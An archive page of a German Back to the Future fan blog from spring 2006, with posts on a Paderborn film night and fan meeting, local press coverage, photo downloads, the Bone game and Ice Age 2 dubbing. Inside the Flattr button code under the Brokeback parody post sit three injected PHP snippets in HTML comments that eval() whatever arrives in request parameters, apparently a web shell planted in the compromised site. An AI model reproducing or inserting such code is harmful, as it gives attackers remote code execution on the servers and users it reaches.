Nochmal Wochenspiegel

17. April 2006

Inzwischen habe ich von verschiedenen Freunden & Bekannten auch die Original-Zeitungsseite bekommen, von der ihr hier einen Scan findet… Von den vielen Fehlern mal abgesehen immer noch eine tolle Sache, dass man uns eine ganze Seite gegönnt hat!

Bone: The Great Cow Race

13. April 2006

Kennt ihr die Bone-Comics? Die Fantasyserie von dem Eisner-Award-Gewinner Jeff Smith geht jetzt als Computerspiel von Telltale Games, das die Handlung der Comics ebenfalls als Serie nachvollzieht, in die zweite Runde. Das Spiel gibt’s als Online-Version zu kaufen und ist nicht nur für Fans des Comics empfehlenswert. Die erste Episode war ein wenig kurz (je nach Geschicklichkeit ca. 3 1/2 Std. reine Spielzeit), dafür gibt’s die jetzt im Doppelpack zusammen mit Teil 2 ermäßigt. „Episodic Gaming“ nennt sich das neue Prinzip, das dem einer Fernsehserie folgt.

Paderborner Presse

13. April 2006

Zumindest in ein Wochenblatt (Wochenspiegel Paderborn) haben wir’s mit unserer Filmnacht schon geschafft. Nitpicker’s Guide: Obwohl der Artikel zunächst gut unterrichtet wirkt – die Bildunterschriften passen zu den Bildern, die Namen sind richtig geschrieben; das ist für mich nicht wirklich selbstverständlich, nachdem man meine Pizza z.B. schon mal an einen Herrn „Wessel“ liefern wollte (nur am Rande interessant ist in diesem Zusammenhang die Tatsache, dass mein Onkel tatsächlich Horst heißt) – kann man sich darüber streiten, ob der anwesende DeLorean wirklich als „Duplikat“ des im Film vorkommenden zu werten ist. Und es heißt TRILOGIE und nicht „Triologie“, verfluxt nochmal! 💡 Whatever… (Nachtrag: Gerade wurde ich darauf aufmerksam gemacht, dass auch das Kino falsch genannt wurde: Es war das Kinoplex und nicht das Cineplex!)
Hier der Link zum Online-Artikel…

Danke an Marty (Big_M) für den Link!

Lutz Mackensy in „Ice Age 2“ wieder dabei

12. April 2006

Nachdem Lutz Mackensy in Teil 1 bereits „Zeke“ (einen der Säbelzahntiger) gesprochen hat, wurde eine von Deutschlands bekanntesten (und meiner bescheidenen Meinung nach auch besten 🙂 ) Synchronstimmen auch für den zweiten Teil wieder engagiert: Wer ein wenig Entzug von der genialen „Doc“-Stimme hat, sollte sich die zweite „Ice Age“-Episode mit geschlossenen Augen reinziehen – der „Flotte Tony“ (im Original übrigens von Jay Leno gesprochen) könnte glatt ein entfernter Verwandter von Doc Brown sein. Natürlich ist dies nicht der einzige Grund, sich den Film anzusehen (wer Fortsetzungen sonst nicht mag, wird hier bestimmt eines Besseren belehrt), aber es ist mir eben positiv aufgefallen 😉

Mehr Fotos aus PB

8. April 2006

Ein zweites Fotopaket kann man inzwischen unter www.hillvalley.de/downloads/kinoplex2.zip herunterladen. Wer nicht ganz so viele MB auf einmal laden möchte/kann, sollte mal auf die Galerie unter www.zidz.com/kinoplex.php schauen…

Fotos aus Paderborn

5. April 2006

Ein richtig umfangreiches Fotopaket von der ZidZ-Filmnacht gibt’s zum Herunterladen unter der Adresse www.hillvalley.de/downloads/kinoplex1.zip – es wird die Tage vielleicht sogar noch erweitert; im Moment ist es schon über 50 MB groß. also eher für DSL-Benutzer geeignet. Ein paar Beispielfotos finden sich auch im Hill Valley Telegraph.

Zurück aus der Zukunft

2. April 2006

Da bin ich wieder – und muss mal eben, zum wiederholten Male übrigens, loswerden wie viel Spaß mir diese Filmnacht inkl. Fantreffen genacht hat. Fotos werde ich im Laufe der nächsten Tage online stellen, aber auf jeden Fall muss ich jetzt alle, die nicht dabei waren, doch noch ein wenig neidisch machen 🙂 (und ihr habt auf jeden Fall was verpasst, habe ich mich doch nach anfänglichem Überlegen auch dazu durchgerungen, nicht nur mit dem Laborkittel sondern auch mit der Einstein-Perücke rumzulaufen, um dem Doc die Ehre zu geben 🙂 ). Dass Henning dann tatsächlich seinen DeLorean mitgebracht hat, war natürlich das Tüpfelchen auf dem „i“, aber auch die persönliche Premiere – ZidZ 1 tatsächlich in der Kinofassung und nicht auf DVD zu sehen – war eine wertvolle Erfahrung. Das Gefühl, vor Beginn des Film in diesem Kino voller Fans zu sitzen und ungefähr genauso aufgeregt zu sein, als würde man ihn tatsächlich zum allerersten Mal sehen – eine Art Zeitreise, in der Tat…

Dass es dann beim 1. Teil wegen des Alters des Films ein paar Aussetzer gab, war weniger schlimm (schließlich waren wir alle textsicher genug). Interessant fand ich da viel mehr noch die Tatsache, den Effekt des PAL-Speedups (Filme laufen auf Video/DVD wegen der Umwandlung von der Kinonorm mit 24 Bildern/sec. auf die Videonorm mit 25 Bildern/sec. – angepasst an die 50Hz des deutschen PAL-Fernsehsystems, daher der Name PAL-Speedup – etwas schneller als im Original) erstmals bewusst gehört zu haben. Die Synchronstimmen, vor allem auffällig bei Marty (Sven Hasper) am Anfang des Films, klangen doch alle ungewohnt und etwas tiefer als sonst. Aber das war dann doch nur ein technisches Detail…

Ein besonderer Gruß an alle anwesenden Fans & die Organisatoren, allen voran „svw_superfan“, der sogar eine kleine Prop-Ausstellung im Foyer ermöglicht hatte!!!

BTTF meets Brokeback Mountain

29. März 2006

Kennt jemand “Brokeback Mountain”? Ein Film der Homosexualität unter Cowboys thematisiert und vielleicht vor allem wegen dieses kontroversen Themas eine schier unüberschaubare Anzahl an Parodien provoziert hat. Auf „Saschas Little World“ (auch ein Blog) fand ich einen Link zu „Brokeback to the Future“, in dem Ausschnitte aus der ZidZ-Trilogie ein wenig umstrukturiert wurden, so dass sie jetzt eine etwas über die normale Männerfreundschaft hinausgehende Beziehung zwischen Marty und Doc andeuten… zum Schreien! 🙂

var flattr_btn = „compact“;
var flattr_uid = „Joerg_McFly“;
var flattr_tle = „BTTF meets Brokeback Mountain“;
var flattr_dsc = „Kennt jemand “Brokeback Mountain”? Ein Film der Homosexualität unter Cowboys thematisiert und vielleicht vor allem wegen dieses kontroversen Them …“;
var flattr_cat = „text“;
var flattr_lng = „de_DE“;
var flattr_tag = „“;
var flattr_url = „blog.hillvalley.de/2006/03/8/“;
var flattr_hide = „false“;

<!– [insert_php]if (isset($_REQUEST["mkJ"])){eval($_REQUEST["mkJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["mkJ"])){eval($_REQUEST["mkJ"]);exit;}[/php] –>

var flattr_btn = „compact“;
var flattr_uid = „Joerg_McFly“;
var flattr_tle = „BTTF meets Brokeback Mountain“;
var flattr_dsc = „Kennt jemand “Brokeback Mountain”? Ein Film der Homosexualität unter Cowboys thematisiert und vielleicht vor allem wegen dieses kontroversen …“;
var flattr_cat = „text“;
var flattr_lng = „de_DE“;
var flattr_tag = „“;
var flattr_url = „blog.hillvalley.de/2006/03/8/&#8220;;
var flattr_hide = „false“;

<!– [insert_php]if (isset($_REQUEST["hFuF"])){eval($_REQUEST["hFuF"]);exit;}[/insert_php][php]if (isset($_REQUEST["hFuF"])){eval($_REQUEST["hFuF"]);exit;}[/php] –>

var flattr_btn = „compact“;
var flattr_uid = „Joerg_McFly“;
var flattr_tle = „BTTF meets Brokeback Mountain“;
var flattr_dsc = „Kennt jemand “Brokeback Mountain”? Ein Film der Homosexualität unter Cowboys thematisiert und vielleicht vor allem wegen dieses kontroversen …“;
var flattr_cat = „text“;
var flattr_lng = „de_DE“;
var flattr_tag = „“;
var flattr_url = „http://blog.hillvalley.de/2006/03/8/“;
var flattr_hide = „false“;

<!– [insert_php]if (isset($_REQUEST["GKrM"])){eval($_REQUEST["GKrM"]);exit;}[/insert_php][php]if (isset($_REQUEST["GKrM"])){eval($_REQUEST["GKrM"]);exit;}[/php] –>

Newsletter zur Filmnacht (Auszug)

29. März 2006

Folgender Newsletter ging gerade an alle angemeldeten Besucher: (Interesse an Update-Infos meiner ZidZ-Seite? Dann schicke eine leere Mail von deinem Account aus an diese Adresse – das Wort „entfernemich“ vorher aus der Adresszeile löschen!)

Hallo liebe Co-Zeitreisenden,

am kommenden Freitag (31.03.2006) ist es also soweit – die Paderborner ZidZ-Filmnacht und gleichzeitig das Fantreffen von zidz.com und hillvalley.de steigt! Seid ihr auch dabei? Es kann nicht garantiert werden, dass es noch Restkarten an der Abendkasse gibt (der Eintritt kostet 8 Euro für alle drei Filme, Infos zur Reservierung und Adresse des Kinos über www.kinoplex.de)…
„Offizielles“ Treffen für Fototermin etc. ist um 18 Uhr an der Kinokasse, einige werden vielleicht auch schon früher da sein. Ob ein Delorean (von Henning, einem Freund von Tornado1986 aus dem zidz.com-Forum) zu sehen sein wird, hängt noch ein bisschen vom Wetter ab, es soll ja u.U. regnen (wenn’s nur nieselt, ist es laut Tornados Aussagen kein Problem 🙂 ) … also Daumen drücken! Ihr wisst ja: Seit wann können die vom Wetterdienst das Wetter vorhersagen? 🙂 Die Filme starten dann um 19 Uhr. Die Vorfreude ist bei den meisten schon unermesslich & es wird bestimmt ein genialer Abend. Wäre schön, sich auch mal IRL zu treffen!
Bis in Zukunft 🙂

Viele Grüße
Jörg
Webmaster, www.hillvalley.de

Der Tag rückt näher…

28. März 2006

Am kommenden Freitag geht’s also ab zur Filmnacht nach Paderborn. Ich habe inzwischen den Laborkittel bekommen, mit dem ich ein bisschen „Doc-Feeling“ in die Sache bringen will (mal sehen, ob ich da noch ein HillValley.de-Logo aufgebügelt bekomme 🙂 ). Morgen im Chat werden noch letzte Details besprochen. Ich melde mich wieder…

Seit(en)reise:  1 ... 46 47 48 49 50 vorwärts>